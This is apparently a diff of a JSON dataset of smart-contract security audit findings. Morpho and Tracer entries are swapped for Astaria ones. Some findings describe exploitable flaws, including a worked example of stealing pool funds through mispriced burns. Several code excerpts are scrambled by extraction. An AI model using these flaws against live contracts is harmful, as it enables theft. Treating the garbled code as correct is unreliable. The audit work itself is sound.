withdrawn by the owner only.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Possible unbounded loop over enteredMarkets array in _getUserHypotheticalBalanceStates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "PositionsManagerForAaveLogic._getUserHypotheticalBalanceStates is looping enteredMar- kets which could be an unbounded array leading to a reverted transaction caused by a block gas limit. While it is true that Morpho will probably handle a subset of assets controlled by Aave, this loop could still revert because of gas limits for a variety of reasons: In the future Aave could have more assets and Morpho could match 1:1 those assets. Block gas size could decrease.
Opcodes could cost more gas.", + "title": "The require statement in decreaseEpochLienCount can be more strict", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "decreaseEpochLienCount has the following require statement that limits who can call into it: require( msg.sender == address(ROUTER()) || msg.sender == address(LIEN_TOKEN()) ); So only the ROUTER() and LIEN_TOKEN() are allowed to call into it. But AstariaRouter never calls into this function.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Missing parameter validation on setters and event spamming prevention", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "User parameter validity should always be verified to prevent contract updates in an inconsistent state. The parameters value should also be different from the old one in order to prevent event spamming (emitting an event when not needed) and improve contract monitoring. contracts/aave/RewardsManagerForAave.sol 20 function setAaveIncentivesController(address _aaveIncentivesController) external override onlyOwner { + + } require(_aaveIncentivesController != address(0), \"param != address(0)\"); require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); contracts/aave/MarketsManagerForAave.sol function setReserveFactor(address _marketAddress, uint16 _newReserveFactor) external onlyOwner { reserveFactor[_marketAddress] = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; updateRates(_marketAddress); emit ReserveFactorSet(_marketAddress, reserveFactor[_marketAddress]); require(_marketAddress != address(0), \"param != address(0)\"); uint16 finalReserveFactor = HALF_MAX_BASIS_POINTS <= _newReserveFactor ?
HALF_MAX_BASIS_POINTS : _newReserveFactor; if( finalReserveFactor !== reserveFactor[_marketAddress] ) { reserveFactor[_marketAddress] = finalReserveFactor; emit ReserveFactorSet(_marketAddress, finalReserveFactor); } updateRates(_marketAddress); - - - - - - - + + + + + + + + + + + } function setNoP2P(address _marketAddress, bool _noP2P) external onlyOwner isMarketCreated(_marketAddress) { + } require(_noP2P != noP2P[_marketAddress], \"param != prevValue\"); noP2P[_marketAddress] = _noP2P; emit NoP2PSet(_marketAddress, _noP2P); function updateP2PExchangeRates(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateP2PExchangeRates(_marketAddress); + { } 21 function updateSPYs(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateSPYs(_marketAddress); + { } contracts/aave/positions-manager-parts/PositionsManagerForAaveGettersSetters.sol function setAaveIncentivesController(address _aaveIncentivesController) external onlyOwner { require(_aaveIncentivesController != address(0), \"param != address(0)\"); require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); + + } Important note: _newNDS min/max value should be accurately validated by the team because this will influence the maximum number of cycles that DDL.insertSorted can do. Setting a value too high would make the transaction fail while setting it too low would make the insertSorted loop exit earlier, resulting in the user being added to the tail of the list. A more detailed issue about the NDS value can be found here: #33 function setNDS(uint8 _newNDS) external onlyOwner { // add a check on `_newNDS` validating correctly max/min value of `_newNDS` require(NDS != _newNDS, \"param != prevValue\"); NDS = _newNDS; emit NDSSet(_newNDS); + + } Important note: _newNDS set to 0 would skip all theMatchingEngineForAave match/unmatch supplier/borrower functions if the user does not specify a custom maxGas A more detailed issue about NDS value can be found here: #34 function setMaxGas(MaxGas memory _maxGas) external onlyOwner { // add a check on `_maxGas` validating correctly max/min value of `_maxGas` // add a check on `_maxGas` internal value checking that at least one of them is different compared to the old version maxGas = _maxGas; emit MaxGasSet(_maxGas); + + ,! } function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner { require(_newTreasuryVaultAddress != address(0), \"param != address(0)\"); require(_newTreasuryVaultAddress != treasuryVault, \"param != prevValue\"); treasuryVault = _newTreasuryVaultAddress; emit TreasuryVaultSet(_newTreasuryVaultAddress); + + } function setRewardsManager(address _rewardsManagerAddress) external onlyOwner { require(_rewardsManagerAddress != address(0), \"param != address(0)\"); require(_rewardsManagerAddress != rewardsManager, \"param != prevValue\"); rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress); emit RewardsManagerSet(_rewardsManagerAddress); + + } Important note: Should also check that _poolTokenAddress is currently handled by the PositionsManagerForAave and by the MarketsManagerForAave. Without this check a poolToken could start in a paused state. 
22 + function setPauseStatus(address _poolTokenAddress) external onlyOwner { require(_poolTokenAddress != address(0), \"param != address(0)\"); bool newPauseStatus = !paused[_poolTokenAddress]; paused[_poolTokenAddress] = newPauseStatus; emit PauseStatusSet(_poolTokenAddress, newPauseStatus); }", + "title": "amount is not used in _afterCommitToLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "amount is not used in _afterCommitToLien to update/decrement s.yIntercept, because even though assets have been transferred out of the vault, they would still need to be paid back and so the net effect on s.yIntercept (that is used in the calculation of the total virtual assets) is 0.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "DDL should prevent inserting items with 0 value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Currently the DDL library is only checking that the actual value (_list.accounts[_id].value) in the list associated with the _id is 0 to prevent inserting duplicates. The DDL library should also verify that the inserted value is greater than 0. This check would prevent adding users with empty values, which may potentially cause the list and as a result the overall protocol to underperform.", + "title": "Use modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted code has require checks on msg.sender which can be converted to modifiers. For instance: require(address(msg.sender) == s.guardian);", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "insertSorted iterates more than max iterations parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The insertSorted function iterates _maxIterations + 1 times instead of _maxIterations times.", + "title": "Prefer SafeCastLib for typecasting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted code above typecasts several constant values. If some value doesn't fit in the type, the cast will silently ignore the higher-order bits. That's currently not the case, but it may pose a risk if these values are changed in the future.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "insertSorted does not behave like a FIFO for same values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Users that have the same value are inserted into the list before other users with the same value. It does not respect the \"seniority\" of the users order and should behave more like a FIFO queue.", + "title": "Rename Multicall to Multidelegatecall", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Multicall.sol performs multiple delegatecalls. Hence, the name Multicall is not suitable. The contract and the file should be named Multidelegatecall; the pattern in question is sketched below.
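For reference, a minimal sketch of the generic multi-delegatecall pattern (not the project's exact source):

    function multicall(bytes[] calldata data) external returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            // each call is a delegatecall into this same contract, hence the suggested name
            (bool ok, bytes memory ret) = address(this).delegatecall(data[i]);
            require(ok);
            results[i] = ret;
        }
    }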
", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "insertSorted inserts elements at wrong index", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The insertSorted function inserts elements after the last element has been insterted, when these should have actually been insterted before the last element. The sort order is therefore wrong, even if the maximum iterations count has not been reached. This is because of the check that the current element is not the tail. if ( ... && current != _list.tail) { insertBefore } else { insertAtEnd } Example: list = [20]. insert(40) then current == list.tail, and is inserted at the back instead of the front. result = [20, 40] list = [30, 10], insert(20) insertion point should be before current == 10, but also current == tail therfore the current != _list.tail condition is false and the element is wrongly inserted at the end. result = [30, 10, 20]", + "title": "safeTransferFrom() without the data argument can be used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted code above sends empty data over an external call via ERC721.safeTransferFrom(from, to, tokenId, data): IERC721(underlyingAsset).safeTransferFrom( address(this), releaseTo, assetId, \"\" ); data can be removed since ERC721.safeTransferFrom(from, to, tokenId) sets empty data too.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "PositionsManagerForAaveLogic gas optimization suggestions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Update the remainingTo variable only when needed. Inside each function, the remainingTo counter could be moved inside the if statement to avoid calculation when the amount that should be subtracted is >0.", + "title": "Fix documentation that updateVaultAfterLiquidation can be called by LIEN_TOKEN, not ROUTER", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The function has the correct validation that it can only be called by LIEN_TOKEN(), but the comment says it can only be called by ROUTER(). require(msg.sender == address(LIEN_TOKEN())); // can only be called by router", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "MarketsManagerForAave._updateSPYs could store calculations in local variables to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The calculation in the actual code must be updated following this issue: #36. This current issue is an example on how to avoid an additional SLOAD. The function could store locally currentReserveFactor, newSupplyP2PSPY and newBorrowP2PSPY to avoid addi- tional SLOAD", + "title": "Declare event and constants at the beginning", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Events and constants are generally declared at the beginning of a smart contract, as in the sketch below.
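A minimal sketch of the conventional ordering (names are hypothetical):

    contract Example {
        uint256 public constant MAX_EPOCH_LENGTH = 100 days; // constants first
        event EpochOpened(uint64 indexed epoch); // then events
        function openEpoch() external {} // functions afterwards
    }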
However, for the highlighted code above, that's not the case.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Declare variable as immutable/constant and remove unused variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Some state variable can be declared as immutable or constant to save gas. Constant variables should be names in uppercase + snake case following the official Solidity style guide. Additionally, variables which are never used across the protocol code can be removed to save gas during deployment and improve readability. RewardsManagerForAave.sol -ILendingPoolAddressesProvider public addressesProvider; -ILendingPool public lendingPool; +ILendingPool public immutable lendingPool; -IPositionsManagerForAave public positionsManager; +IPositionsManagerForAave public immutable positionsManager; SwapManagerUniV2.sol -IUniswapV2Router02 public swapRouter = IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter ,! +IUniswapV2Router02 public constant SWAP_ROUTER = ,! IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter -IUniswapV2Pair public pair; +IUniswapV2Pair public immutable pair; SwapManagerUniV3.sol 27 -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -address public WETH9; // Intermediate token address. +address public immutable WETH9; // Intermediate token address. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -bool public singlePath; +bool public boolean singlePath; SwapManagerUniV3OnEth.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -IUniswapV3Pool public pool2; +IUniswapV3Pool public immutable pool2;", + "title": "Rename Vault to PrivateVault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Vault contract is used to represent private vaults.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Function does not revert if balance to transfer is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Currently when the claimToTreasury() function is called it gets the amountToClaim by using un- derlyingToken.balanceOf(address(this). It then uses this amountToClaim in the safeTransfer() function and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for the amountToClaim to be 0. 
In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily.", + "title": "Remove comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Comment at line WithdrawProxy.sol#L229 can be removed: if ( block.timestamp < s.finalAuctionEnd // || s.finalAuctionEnd == uint256(0) ) { The condition in the comment is always false as the code already reverts in that case.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "matchingEngine should be initialized in PositionsManagerForAaveLogics initialize function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "MatchingEngineForAave inherits from PositionsManagerForAaveStorage which is an UUPSUp- gradeable contract. Following UUPS best practices, should also be initialized. the MatchingEngineForAave deployed by PositionsManagerForAaveLogic", + "title": "WithdrawProxy and PrivateVault symbols are missing hyphens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The symbol for the WithdrawProxy token is missing a hyphen after the W, which will make the name AST-W0x... instead of AST-W-0x.... Similarly, the symbol for the Private Vault token (in Vault.sol) is missing a hyphen after the V.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Misc: notation, style guide, global unit types, etc", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Follow solidity notation, standard style guide and global unit types to improve readability.", + "title": "Lien cannot be bought out after stack.point.end", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The _getRemainingInterest function reverts with Panic(0x11) when block.timestamp > stack.point.end.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Outdated or wrong Natspec documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Some Natspec documentation is missing parameters/return value or is not correctly updated to reflect the function code.", + "title": "Inconsistent strictness of inequalities in isValidRefinance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In isValidRefinance, we check that either: a) newRate < maxNewRate && newEnd >= oldEnd b) newEnd - oldEnd >= minDurationIncrease && newRate <= oldRate We should be consistent in whether these checks enforce strict or non-strict inequalities.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Use the official UniswapV3 0.8 branch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The current repository creates local copies of the UniswapV3 codebase and manually migrates the contracts to Solidity 0.8.", + "title": "Clarify comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "A few comments are not clear about what
they are referring to: zone: address(this), // 0x20 ... conduitKey: s.CONDUIT_KEY, // 0x120", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Unused events and unindexed event parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Certain parameters should be defined as indexed to track them from web3 applications / security monitoring tools.", + "title": "Remove unused files", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "CallUtils.sol is not used anywhere in the codebase.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Rewards are ignored in the on-pool rate computation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Morpho claims that the protocol is a strict improvement upon the underlying lending protocols. It tries to match as many suppliers and borrowers P2P at the supply/borrow mid-rate of the underlying protocol. However, given high reward incentives paid out to on-pool users it could be the case that being on the pool yields a better rate than the P2P rate.", + "title": "Document privileges and entities holding these privileges", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are certain privileged functionalities in the codebase (recognized through the requiresAuth modifier). Currently, we have to refer to tests to identify the setup.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Pool token price is incorrect when there is more than one pending upkeep", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The amount of pool tokens to mint and quote tokens to burn is determined by the pool token price. This price, for a commit at update interval ID X, should not be influenced by any pending commits for IDs greater than X. However, in the current implementation price includes the current total supply but burn commits burn pool tokens immediately when commit() is called, not when upkeep() is executed. // pool token price computation at execution of updateIntervalId, example for long price priceHistory[updateIntervalId].longPrice = longBalance / (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[updateIntervalId].longBurnAmount + _totalCommit[updateIntervalId].longBurnShortMintAmount) ,! The implementation tries to fix this by adding back all tokens burned at this updateIntervalId but it must also add back all tokens that were burned in future commits (i.e. when ID > updateIntervalID). This issue allows an attacker to get a better pool token price and steal pool token funds. Example: Given the preconditions: long.totalSupply() = 2000 User owns 1000 long pool tokens lastPriceTimestamp = 100 updateInterval = 10 frontRunningInterval = 5 At time 104: User commits to BurnLong 500 tokens in appropriateUpdateIntervalId = 5. Upon execution user receives a long price of longBalance / (1500 + 500) if no further future commitments are made. Then, as tokens are burned totalPoolCommitments[5].longBurnAmount = 500 and long.totalSupply -= 500. time 106: At 6 as they are now past totalPoolCommitments[6].longBurnAmount = 500, long.totalSupply -= 500 again as tokens are burned.
User commits another 500 tokens to BurnLong at appropriateUpdateIntervalId = Now the frontRunningInterval and are scheduled for the next update. the 5th update interval Finally, (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[5].longBurnAmount + _totalCom- mit[5].longBurnShortMintAmount = longBalance / (1000 + 500) which is a better price than what the user should have received. ID is executed by the pool keeper but at longPrice = longBalance / With a longBalance of 2000, the user receives 500 * (2000 / 1500) = 666.67 tokens executing the first burn commit and 500 * ((2000 - 666.67) / 1500) = 444.43 tokens executing the second one. 5 The total pool balance received by the user is 1111.1/2000 = 55.555% by burning only 1000 / 2000 = 50% of the pool token supply.", + "title": "Document and ensure that maximum number of liens should not be set greater than 256", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Maximum number of liens in a stack is currently set to 5. While paying for a lien, the index in the stack is casted to uint8. This makes the implicit limit on maximum number of liens to be 256.", "labels": [ "Spearbit", - "Tracer", - "Severity: Critical" + "Astaria", + "Severity: Informational" ] }, { - "title": "No price scaling in SMAOracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The update() function of the SMAOracle contract doesnt scale the latestPrice although a scaler is set in the constructor. On the other hand, the _latestRoundData() function of ChainlinkOracleWrapper contract does scale via toWad(). contract SMAOracle is IOracleWrapper { constructor(..., uint256 _spotDecimals, ...) { ... require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); ... /* `scaler` is always <= 10^18 and >= 1 so this cast is safe */ scaler = int256(10**(MAX_DECIMALS - _spotDecimals)); ... } function update() internal returns (int256) { /* query the underlying spot price oracle */ IOracleWrapper spotOracle = IOracleWrapper(oracle); int256 latestPrice = spotOracle.getPrice(); ... priceObserver.add(latestPrice); // doesn't scale latestPrice ... } contract ChainlinkOracleWrapper is IOracleWrapper { function getPrice() external view override returns (int256) { (int256 _price, ) = _latestRoundData(); return _price; } function _latestRoundData() internal view returns (int256, uint80) { (..., int256 price, ..) = AggregatorV2V3Interface(oracle).latestRoundData(); ... return (toWad(price), ...); }", + "title": "transferWithdrawReserve() can return early when the current epoch is 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If s.currentEpoch == 0, s.currentEpoch - 1 will wrap around to type(uint256).max and we will most probably will drain assets into address(0) in the following block: unchecked { s.withdrawReserve -= WithdrawProxy(withdrawProxy) .drain( s.withdrawReserve, s.epochData[s.currentEpoch - 1].withdrawProxy ) .safeCastTo88(); } But this cannot happen since in the outer if block the condition s.withdrawReserve > 0 indirectly means that s.currentEpoch > 0. The indirect implication above regarding the 2 conditions stems from the fact that s.withdrawReserve has only been set in transferWithdrawReserve() function or processEpoch(). 
In the transferWithdrawReserve() function it assumes a positive value only when s.currentEpoch > uint64(0), and in processEpoch() at the end we increment s.currentEpoch.", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Two different invariantCheck variables used in PoolFactory.deployPool()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployPool() function in the PoolFactory contract uses two different invariantCheck variables: the one defined as a contract's instance variable and the one supplied as a parameter. Note: This was also documented in Secureum's CARE-X report issue \"Invariant check incorrectly fixed\". function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., deploymentParameters.invariantCheck, ... ); // version 1 of invariantCheck ... ILeveragedPool.Initialization memory initialization = ILeveragedPool.Initialization({ ... _invariantCheckContract: invariantCheck, // version 2 of invariantCheck ... });", + "title": "Two of the inner if blocks of processEpoch() check for a condition that has already been checked by an outer if block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following two if block checks are redundant: if (address(currentWithdrawProxy) != address(0)) { currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); } uint256 expected = 0; if (address(currentWithdrawProxy) != address(0)) { expected = currentWithdrawProxy.getExpected(); } The condition address(currentWithdrawProxy) != address(0) has already been checked by an outer if block.", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Duplicate user payments for long commits when paid from balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When minting pool tokens in commit(), the fromAggregateBalance parameter indicates if the user wants to pay from their internal balances or by transferring the tokens. The second if condition is wrong and leads to users having to pay twice when calling commit() with CommitType.LongMint and fromAggregateBalance = true.", + "title": "General formatting suggestions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": " PublicVault.sol#L283 : there are extra surrounding parentheses", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Initial executionPrice is too high", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When a pool is deployed the initial executionPrice is calculated as firstPrice * 1e18 where firstPrice is ILeveragedPool(_poolAddress).getOraclePrice(): contract PoolKeeper is IPoolKeeper, Ownable { function newPool(address _poolAddress) external override onlyFactory { int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice),
FIXED_POINT)); executionPrice[_poolAddress] = startingPrice; } } All other updates to executionPrice use the result of getPriceAndMetadata() directly without scaling: function performUpkeepSinglePool() { ... (int256 latestPrice, ...) = pool.getUpkeepInformation(); ... executionPrice[_pool] = latestPrice; ... } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function getUpkeepInformation() { (int256 _latestPrice, ...) = IOracleWrapper(oracleWrapper).getPriceAndMetadata(); return (_latestPrice, ...); } } The price after firstPrice will always be lower; therefore the funding rate payment will always go to the shorts, and long pool token holders will incur a loss.", + "title": "Identical collateral check is performed twice in _createLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _createLien, a check is performed that the collateralId of the new lien matches the collateralId of the first lien on the stack. if (params.stack.length > 0) { if (params.lien.collateralId != params.stack[0].lien.collateralId) { revert InvalidState(InvalidStates.COLLATERAL_MISMATCH); } } This identical check is performed twice (L383-387 and L389-393).", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Paused state can't be set and therefore withdrawQuote() can't be executed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The checkInvariants() function of the InvariantCheck contract is called via the modifiers checkInvariantsBeforeFunction() and checkInvariantsAfterFunction() of both LeveragedPool and PoolCommitter contracts, and it is meant to pause the contracts if the invariant checks don't hold. The aforementioned modifiers also contain the require(!paused, \"Pool is paused\"); statement, which reverts the entire transaction and resets the paused variable that was just set. Furthermore, the paused state can only be set by the InvariantCheck contract due to the onlyInvariantCheckContract modifier. Thus the paused variable will never be set to true, making it impossible to execute withdrawQuote(), because it requires the contract to be paused. This means that the quote tokens will always stay in the pool even if invariants don't hold and all other actions are blocked. Relevant parts of the code: The checkInvariants() function calls InvariantCheck.pause() if the invariants don't hold. The latter calls pause() in LeveragedPool and PoolCommitter: contract InvariantCheck is IInvariantCheck { function checkInvariants(address poolToCheck) external override { ... pause(IPausable(poolToCheck), IPausable(address(poolCommitter))); ... } function pause(IPausable pool, IPausable poolCommitter) internal { pool.pause(); poolCommitter.pause(); } } In LeveragedPool and PoolCommitter contracts, the checkInvariantsBeforeFunction() and checkInvariantsAfterFunction() modifiers will make the transaction revert if checkInvariants() sets the paused state.
contract LeveragedPool is ILeveragedPool, Initializable, IPausable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external override onlyInvariantCheckContract { // can only be called from InvariantCheck paused = true; emit Paused(); } } contract PoolCommitter is IPoolCommitter, Initializable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external onlyInvariantCheckContract { // can only be called from InvariantCheck paused = true; emit Paused(); }", + "title": "checkAllowlistAndDepositCap modifier can be defined to consolidate some of the mint and deposit logic for public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following code snippet has been used for both mint and deposit endpoints of a public vault: VIData storage s = _loadVISlot(); if (s.allowListEnabled) { require(s.allowList[receiver]); } uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); }", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "The value of lastExecutionPrice fails to update if pool.poolUpkeep() reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The performUpkeepSinglePool() function of the PoolKeeper contract updates executionPrice[] with the latest price and calls pool.poolUpkeep() to process the price difference. However, pool.poolUpkeep() can revert, for example due to the checkInvariantsBeforeFunction modifier in mintTokens(). If pool.poolUpkeep() reverts, then the previous price value is lost and the processing will not be accurate. Therefore, it is safer to store the new price only if pool.poolUpkeep() has been executed successfully. function performUpkeepSinglePool(...) public override { ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { // previous price can get lost if poolUpkeep() reverts ... // executionPrice[_pool] should be updated here } catch Error(string memory reason) { ...
